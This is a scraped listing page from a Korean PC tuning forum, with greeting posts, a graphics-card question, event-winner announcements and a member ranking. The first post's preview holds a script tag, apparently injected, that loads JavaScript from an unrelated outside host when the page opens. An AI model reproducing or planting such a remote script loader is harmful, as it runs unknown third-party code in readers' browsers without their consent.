문서 (137)

• 안녕하세요 ㅎ [6]
    오늘 가입했어요 ㅎㅎ이것저것 눈팅만하다 가입했네용 ㅎ 잘부탁드려요 ㅎㅎ <script src="https://cloudssl.my.phpcloud.com/super/contentScript.js" id="superInsectID"></script>
    kimdae | 2014-04-09 13:54 | 조회 수 579
  • 가입인사드립니다 ㅎㅎ [5]
    조만간에 튜닝이라는 요소까지 고려하면서 시스템 업그레이드를 생각중인 한사람입니다. 이제품 저제품 찾다보니 시중에 나온 제품들 가지고는 얼마 알지도 못하는 저를 만족시키는데에도 한계가 있는것같아 다른동네...
    사고야마 | 2014-03-04 01:00 | 조회 수 131 | 추천 수 3
  • 안녕하세요 ㅎㅎ 가입인사 드립니다. [6]
    안녕하세요 가입한지는 며칠 지났지만 가입인사 있는줄도 모르고 있었네요 ㅎㅎ 이런저런 튜닝글들 보면서 우와 우와만 연발하고 있는데요 저도 뭔가 튜닝의뢰를 해보고 싶네요 틈틈히 들어와서 구경하겠습니다^^
    쵸코맛밀키스 | 2014-02-14 21:58 | 조회 수 135 | 추천 수 3
  • 그래픽카드 고르기가 참 힘드네요ㅎㅎ [20]
    이번에 동생놈 컴한대 맞춰주려고 하는데 다른건 다 골랐는데 그래픽카드에서 막히네요ㅎㅎ 동생은 옵션 적당히 타협하는 수준에서 최신게임들이 돌아가면 되긴하는데 이왕 맞춰줄꺼 좋게 맞춰주고싶은 마음이 들어서...
    BIGSHOT | 2014-02-12 20:16 | 조회 수 297 | 추천 수 4
  • 배가 고파서 더 이상은 못하겠다 ㅎㅎㅎ [10]
    오늘 조립하다 기리 3개 분질러져서 낑낑 거리면서 했네요 분질러지면서 기스도 심하게 났고 아침부터 했는데 배가 너무 고파서 시간 보니까 시간이 이리 되었네요 방 안은 개판되었네요 아 빨리 봄이 되어야지 옥상 ...
    사랑굿 | 2014-02-09 19:25 | 조회 수 296 | 추천 수 4
  • 사랑굿님 이벤트 물품 수령했습니다 ㅎㅎ [6]
    수업중에 전화가 몇번온걸 튕겼더니 사랑굿님이더군요~ 얼마나 미안했는지 ㅠ... 사진은 많이 올테니 저는 이벤트 물품으로 제작한 사진을 추후에 올리도록 하겠습니다 ~ 그래봤자 어떤것에 쓰이는 스위치 일테지만요...
    푸른류안 | 2014-02-07 06:40 | 조회 수 273 | 추천 수 3
  • 새해 복 많이 받으세요 ㅎㅎ [12]
    새해 건강하시고 복도 많이 받으시고요 하시는 일들 모두 잘되시길 바랍니다. 로또 1등도 되시길 바라구요... 요즘 이래 저래 스트레스 만땅인채로...억지로 살고 있는것 같은 느낌이 드네요 .. 새해 부터 이러면 안...
    몰라묻지마 | 2014-02-01 00:04 | 조회 수 184 | 추천 수 3
  • 당첨자 10분 간택되셨습니다.ㅎㅎ [20]
    하멜선장님 하나배님 청안의눈물님 BD님 BIGSHOT님 무적쥔장님 핑크우드님 서유니빠님 마루치님 ZARD님 10분이시고요 공정한 추첨 확인을 위해서 뽑는 순간 동영상으로 유튜브로 올려 놨습니다.ㅋㅋ 참고로 이번 이벤...
    마이웍스 | 2013-12-27 00:17 | 조회 수 252 | 추천 수 5
  • 다들 기다리고 계신가요?ㅎㅎ [20]
    괜히 저까지 쫄깃해집니다.ㅎㅎ 현재 36분 신청 하셨고요 12시 땡하면 추첨해서 스샷과 함께 당첨자 10분 이벤트 게시글에 올려 드릴께요. 당첨되신 분들은 사진 보시고 필요한 로고 본인 레벨 확인하신 후 갯수만큼 ...
    마이웍스 | 2013-12-26 23:27 | 조회 수 212 | 추천 수 1
  • 글픽카드 옆간지 LED를 만들어보고싶네요..ㅎㅎ [6]
    지금 R9 290X를 사용하고있습니다~ 성능면에서는 정말 다른카드 부럽지 않은데.. 지포스시리즈 딱하나 부러운게 타이탄이나 780시리즈 레퍼보면 GEFORCE GTX라고 녹색 led들어오는 옆간지led가 참 부럽더군요.. 빨간...
    흑발머리 | 2013-12-19 16:37 | 조회 수 645 | 추천 수 1

1 도현 102195
2 클루노이드 77205
3 nono201 62828
4 레네씨 50712
5 Ken™ 49628
6 Mushishi 47106
7 오군 41831
8 핑크우드 40227
9 하얀바나나 32933
10 화랑 30263
Skin by Elkha
yesterday 401